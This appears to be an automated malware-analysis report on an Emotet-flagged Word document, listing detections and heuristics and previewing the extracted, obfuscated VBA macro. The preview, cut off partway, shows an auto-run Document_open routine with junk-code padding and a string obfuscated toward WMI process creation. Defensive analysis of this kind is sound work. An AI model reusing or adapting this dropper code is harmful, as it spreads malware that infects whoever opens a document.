MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with a specific Emotet signature. High-severity heuristics indicate the presence of a Document_Open VBA macro that uses CreateObject to execute code. The macro likely attempts to download and execute a second-stage payload, a common Emotet behavior. While the exact download URL is not explicitly reconstructed due to obfuscation, the presence of VBA macros and the Emotet family attribution strongly suggest this attack pattern.
Heuristics 6
-
ClamAV: Doc.Malware.Emotet-9756469-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emotet-9756469-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16334 bytes |
SHA-256: 48c1fb4305eadf2de4714d9dd50a2d4c0f150393f04718c340b2271902d0acb4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "G8pody_7y9budmxr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Fkneo8urhryuvu = Array(Lz39zo_w8ref51al1q + "N87srieycker6wIpxj_bizryj222 E0dgbcugk1u2" + I4_kuqnwzqrnkio5ir, X7efnzul3imtpl, Gi4vgc9qnhotk001.Caax6c516ame70p, Jzy0hknvrtw43 + "Encjg5bhxxv_ewnm8 B_71fjjdtkx T84sw7kkisjgbboh Tifwu240qh4_")
End Sub
Attribute VB_Name = "Gi4vgc9qnhotk001"
Attribute VB_Base = "0{D39976AE-92F7-4256-A931-6EDFFD7071E3}{D1261F4A-BE72-4A6B-8CA2-804C041CD414}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Caax6c516ame70p()
On Error Resume Next
Select Case Lf5crgsyh2f
Case "M3g6d1vvekypvea"
Wws8fzzane0b85kd3n = (UIbjsahlkdas)
Wws8fzzane0b85kd3n = JHNklHS
Wws8fzzane0b85kd3n = Atn(ihKLNsad)
Wws8fzzane0b85kd3n = Log(323)
Case "Vx53wx6s3xl"
Wws8fzzane0b85kd3n = 288262913
Wws8fzzane0b85kd3n = u23ioyhiggukjjs
End Select
Select Case Hx5afl71g0bm
Case "L0frpsmgo5u8o969z"
Wws8fzzane0b85kd3n = 88383833333#
Wws8fzzane0b85kd3n = (qwlhusaidbwq)
Case "Lpnkrqykjil"
Wws8fzzane0b85kd3n = lkqwhnekqwn
Wws8fzzane0b85kd3n = Log(345345)
Wws8fzzane0b85kd3n = Atn(jsghi2lklqw)
Wws8fzzane0b85kd3n = smbdjlsblkhwqewqd
End Select
B4__cqf6pj_c17c = 105
On Error Resume Next
Select Case Lf5crgsyh2f
Case "M3g6d1vvekypvea"
Wws8fzzane0b85kd3n = (UIbjsahlkdas)
Wws8fzzane0b85kd3n = JHNklHS
Wws8fzzane0b85kd3n = Atn(ihKLNsad)
Wws8fzzane0b85kd3n = Log(323)
Case "Vx53wx6s3xl"
Wws8fzzane0b85kd3n = 288262913
Wws8fzzane0b85kd3n = u23ioyhiggukjjs
End Select
Select Case Hx5afl71g0bm
Case "L0frpsmgo5u8o969z"
Wws8fzzane0b85kd3n = 88383833333#
Wws8fzzane0b85kd3n = (qwlhusaidbwq)
Case "Lpnkrqykjil"
Wws8fzzane0b85kd3n = lkqwhnekqwn
Wws8fzzane0b85kd3n = Log(345345)
Wws8fzzane0b85kd3n = Atn(jsghi2lklqw)
Wws8fzzane0b85kd3n = smbdjlsblkhwqewqd
End Select
Vw5gd2gdt3xqd9h = Chr$(B4__cqf6pj_c17c + (10))
On Error Resume Next
Select Case Lf5crgsyh2f
Case "M3g6d1vvekypvea"
Wws8fzzane0b85kd3n = (UIbjsahlkdas)
Wws8fzzane0b85kd3n = JHNklHS
Wws8fzzane0b85kd3n = Atn(ihKLNsad)
Wws8fzzane0b85kd3n = Log(323)
Case "Vx53wx6s3xl"
Wws8fzzane0b85kd3n = 288262913
Wws8fzzane0b85kd3n = u23ioyhiggukjjs
End Select
Select Case Hx5afl71g0bm
Case "L0frpsmgo5u8o969z"
Wws8fzzane0b85kd3n = 88383833333#
Wws8fzzane0b85kd3n = (qwlhusaidbwq)
Case "Lpnkrqykjil"
Wws8fzzane0b85kd3n = lkqwhnekqwn
Wws8fzzane0b85kd3n = Log(345345)
Wws8fzzane0b85kd3n = Atn(jsghi2lklqw)
Wws8fzzane0b85kd3n = smbdjlsblkhwqewqd
End Select
Dfyaud_a9q0455 = "b3bb 17t2 fvhvhjb3bb 17t2 fvhvhjwb3bb 17t2 fvhvhjib3bb 17t2 fvhvhjnmb3bb 17t2 fvhvhjb3bb 17t2 fvhvhjgmb3bb 17t2 fvhvhjtb3bb 17t2 fvhvhjb3bb 17t2 fvhvhj" + Vw5gd2gdt3xqd9h + "b3bb 17t2 fvhvhjb3bb 17t2 fvhvhj:b3bb 17t2 fvhvhjwb3bb 17t2 fvhvhjinb3bb 17t2 fvhvhjb3bb 17t2 fvhvhj3b3bb 17t2 fvhvhj2b3bb 17t2 fvhvhj_b3bb 17t2 fvhvhj" + Gi4vgc9qnhotk001.Olbt49nw9vi1gq_jfs + "b3bb 17t2 fvhvhjrob3bb 17t2 fvhvhjb3bb 17t2 fvhvhjceb3bb 17t2 fvhvhjsb3bb 17t2 fvhvhjsb3bb 17t2 fvhvhj"
On Error Resume Next
Select Case Lf5crgsyh2f
Case "M3g6d1vvekypvea"
Wws8fzzane0b85kd3n = (UIbjsahlkdas)
Wws8fzzane0b85kd3n = JHNklHS
Wws8fzzane0b85kd3n = Atn(ihKLNsad)
Wws8fzzane0b85kd3n = Log(323)
Case "Vx53wx6s3xl"
Wws8fzzane0b85kd3n = 288262913
Wws8fzzane0b85kd3n = u23ioyhiggukjjs
End Select
Select Case Hx5afl71g0bm
Case "L0frpsmgo5u8o969z"
Wws8fzzane0b85kd3n = 88383833333#
Wws8fzzane0b85kd3n = (qwlhusaidbwq)
Case "Lpnkrqykjil"
Wws8fzzane0b85kd3n = lkqwhnekqwn
Wws8fzzane0b85kd3n = Log(345345)
Wws8fzzane0b85kd3n = Atn(jsghi2lklqw)
Wws8fzzane0b85kd3n = smbdjlsblkhwqewqd
End Select
Tf24kl9jk8ly = Bmqo72nwi65qtu4(Dfyaud_a9q0455)
On Error Resume Next
Select Case Lf5crgsyh2f
Case "M3g6d1vvekypvea"
Wws8fzzane
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.